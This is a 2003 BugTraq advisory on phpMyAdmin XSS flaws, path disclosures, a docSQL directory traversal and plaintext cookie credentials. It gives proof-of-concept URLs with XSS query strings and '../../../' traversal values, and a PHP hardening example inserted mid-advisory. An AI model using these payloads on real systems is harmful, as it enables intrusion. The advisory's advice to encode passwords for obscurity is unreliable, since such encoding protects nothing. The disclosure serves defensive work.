BugTraq
phpMyAdmin XSS Vulnerabilities, Directory Traversal Attack, Information Encoding Weakness and Path Disclosures Jun 18 2003 04:33PM
Lorenzo Manuel Hernandez Garcia-Hierro (security lorenzohgh com)


phpMyAdmin XSS Vulnerabilities, Directory Traversal Attack, Information Encoding Weakness and Path Disclosures

--------------------

Product: phpMyAdmin
Vendor: phpMyAdmin Development Team

Versions:

VULNERABLE
- 2.5.2 CVS (in development)
- 2.5.x
- 2.4.x
- 2.3.x
- 2.2.x
- 2.1.x
- 2.0.x
- 1.x.x

NOT VULNERABLE
- ?

Advisory: NSRG-15-7

---------------------

Description:

phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, and manage keys on fields.

-----------------------------------------
SECURITY HOLES FOUND and PROOFS OF CONCEPT:
-----------------------------------------

I encountered Cross Site Scripting vulnerabilities and Path Disclosures in some files of the phpMyAdmin installation. With these files, by sending a specially crafted URL you can execute commands on the client side only and show the local path of the phpMyAdmin installation. The failures are related to an input validation flaw and an improper configuration of php.ini and of the PHP configuration declare library (declare_php.lib.php) in phpMyAdmin for the error flags.

I encountered a very dangerous directory traversal attack in a docSQL import system too.

I discovered that phpMyAdmin doesn't encode the MySQL user and password; it saves the data in plain text without encoding!

-------------------------------
| XSS AND PATH DISCLOSURES |
-------------------------------

The files affected by the XSS attack (Cross Site Scripting) and Path Disclosure are:

- sql.php / sql.php3 - Path Disclosure & XSS -
- pdf_schema.php - Path Disclosure & XSS -
- pdf_pages.php - Path Disclosure & XSS -
- ldi_table.php - Path Disclosure & XSS -
- mult_submits.inc.php - Path Disclosure & XSS -
- chk_rel.php - Path Disclosure -
- db_create.php - Path Disclosure -
- db_datadict.php - Path Disclosure & XSS -
- db_details.php - Path Disclosure -
- db_details_common.php - Path Disclosure -
- db_details_db_info.php - Path Disclosure -
- db_details_export.php - Path Disclosure -
- db_details_structure.php - Path Disclosure -
- db_printview.php - Path Disclosure & XSS -
- db_search.php - Path Disclosure -
- header_printview.inc.php - Path Disclosure -
- ldi_check.php - Path Disclosure -
- read_dump.php - Path Disclosure & XSS -
- tbl_addfield.php - Path Disclosure -
- tbl_alter.php - Path Disclosure -
- tbl_create.php - Path Disclosure -
- tbl_dump.php - Path Disclosure -
- tbl_move_copy.php - Path Disclosure -
- tbl_printview.php - Path Disclosure -
- tbl_properties.inc.php - Path Disclosure -
- tbl_properties.php - Path Disclosure -
- tbl_properties_common.php - Path Disclosure -
- tbl_properties_export.php - Path Disclosure -
- tbl_properties_links.php - Path Disclosure -
- tbl_properties_operations.php - Path Disclosure -
- tbl_properties_options.php - Path Disclosure -
- tbl_properties_table_info.php - Path Disclosure -
- tbl_query_box.php - Path Disclosure -
- tbl_relation.php - Path Disclosure -
- tbl_rename.php - Path Disclosure -
- tbl_replace.php - Path Disclosure -
- tbl_select.php - Path Disclosure -

NOTE: The Path Disclosures occur when you access the affected file directly, without any QUERY_STRING; these files require a valid session.

The XSS can be executed by passing crafted query strings to the PHP scripts; see Samples below for more information.

FILES VULNERABLE TO PATH DISCLOSURES AND XSS THAT DO NOT NEED A VALID SESSION:

- libraries/auth/[cookie.auth.lib.php] - Path Disclosure -
- libraries/xpath/[XPath.class.php] - Path Disclosure -
- libraries/[ip_allow_deny.lib.php] - Path Disclosure -
- libraries/[select_lang.lib.php] - Path Disclosure -
- libraries/sqlparser.lib.php - Path Disclosure -
- libraries/db_table_exists.lib.php - Path Disclosure -

-----------------------------------
| DIRECTORY TRAVERSAL ATTACK &     |
| REMOTE LOCAL FILE RETRIEVING &   |
| REMOTE INTERNAL DIRECTORY LISTING |
-----------------------------------

I found a dangerous directory traversal attack in the file called db_details_importdocsql.php (the file import system); I explain this failure in the Proof of Concept:

____Proof of Concept______

You must send a crafted request to the db_details_importdocsql.php file:

http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=[YOUR DIRECTORY TRAVERSAL PATH]

If you want to do an internal directory listing you must send this request:

http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../

With this request you can list the internal directories in the root dir of a Windows installation (normally c:\).

Note that you can't request files (only dirs) with db_details_importdocsql.php; if you attempt to get a file you get this message: This was not a Directory .

SAMPLE RESULT OF A CGI-BIN DIRECTORY LISTED WITH THIS ATTACK:

Server iamnottotallysecured.not
Ignoring the file .
Ignoring the file ..
Ignoring the file phf.cgi // ;-)
Ignoring the file dumpenv.pl
Ignoring the file test-cgi // ;-)
Ignoring the file testcgi.pl // ;-D
Ignoring the file wwwboard.pl
Ignoring the file count.cgi
Ignoring the file php.cgi // ;-D
Ignoring the file passwd.pl
Ignoring the file admin.cgi
Ignoring the file ftp.cgi
Ignoring the file formmail.pl // ;-D
Ignoring the file proxy.pl
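The fix the advisory asks for in the docSQL importer amounts to canonicalising the docpath value and refusing anything that resolves outside the import directory. The following is an added example, not phpMyAdmin's own code; weak_doc_dir and safe_doc_dir are hypothetical names, and the base directory is a constructed temporary one.

```php
<?php
// Added example, not phpMyAdmin's own code: constrain a user-supplied
// docpath value to a fixed import directory before listing it.

// Weak pattern, as the advisory describes it: the parameter is joined to
// the base directory as-is, so "../../../" walks out of the web root.
function weak_doc_dir(string $base, string $docpath): string
{
    return $base . '/' . $docpath;
}

// Hardened version: canonicalise with realpath() and require the result to
// remain inside the canonical base directory. Returns null on any rejection
// so the caller can emit one uniform error without revealing whether the
// target exists, is a file, or is a directory.
function safe_doc_dir(string $base, string $docpath): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false || !is_dir($baseReal)) {
        return null;
    }
    // Reject empty values, NUL bytes and absolute Unix or Windows paths
    // before touching the filesystem at all.
    if ($docpath === '' || strpos($docpath, "\0") !== false
        || $docpath[0] === '/' || preg_match('#^[A-Za-z]:[\\\\/]#', $docpath)) {
        return null;
    }
    $target = realpath($baseReal . DIRECTORY_SEPARATOR . $docpath);
    if ($target === false || !is_dir($target)) {
        return null;
    }
    // Compare with a trailing separator so /srv/docsql_other is not accepted
    // as being inside /srv/docsql.
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $baseReal && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Constructed demonstration in a temporary directory.
$base = sys_get_temp_dir() . '/docsql_' . uniqid();
mkdir($base . '/project1', 0700, true);

var_dump(weak_doc_dir($base, '../../../'));       // escapes, would be listed
var_dump(safe_doc_dir($base, 'project1'));        // canonical path inside $base
var_dump(safe_doc_dir($base, '../../../'));       // NULL: leaves the base
var_dump(safe_doc_dir($base, 'project1/../..'));  // NULL: leaves the base
var_dump(safe_doc_dir($base, '/'));               // NULL: absolute path
```

Returning the same null for "not found", "is a file" and "outside the base" also removes the "This was not a Directory" oracle the advisory notes, which otherwise confirms that a traversed path exists.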

_______

Samples:
"""""""

Note that these paths are from my personal server in my testing lab.

The target user (or you) must be logged in to run the attacks:

http://localhost/mysql/sql.php?sql_query=">..<h1>XSS ! Oh my God!</h1>

http://localhost/mysql/db_datadict.php?db=XSS

http://localhost/mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../BOOT.ini

http://localhost/mysql/read_dump.php?db=nonexistent&sql_query="><h1>XSS</h1>

http://localhost/mysql/tbl_properties_links.php?table_info_num_rows=10&url_query="><h1>XSS

------------------
| INFORMATION |
| ENCODING |
| WEAKNESS |
------------------

phpMyAdmin doesn't use any encoding type like BASE64/RadiX64; it only saves the user data (username and password too) in plain text without any encoding.

The authentication token in the cookie is this:

pma_cookie_username=[UserName]; lang=[language]-iso-8859-1; pma_cookie_password=[your password]

A sample is:

pma_cookie_username=god; lang=en-iso-8859-1; pma_cookie_password=doesnotexist

-----------------
| SOLUTIONS ;-p |
-----------------

- First: Redefine the error flags in php.ini to Off. [Path Disclosures]
- Second: Use a partial / secure encoding for authentication tokens, like RadiX64 (not very secure, but an attacker can think that it is a more secure algorithm; obscurity ;-D).
- Third: Review the db_details_importdocsql.php file to prevent directory traversal attacks and remote local directory listing.

-----------
| CONTACT |
-----------

Lorenzo Hernandez Garcia-Hierro
--- Computer Security Analyzer ---
--Nova Projects Professional Coding--

PGP: Keyfingerprint
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2
ID: 0x9C38E1D7

**********************************
NSRGroup : http://security.novappc.com
are you totally secured ?
______________________
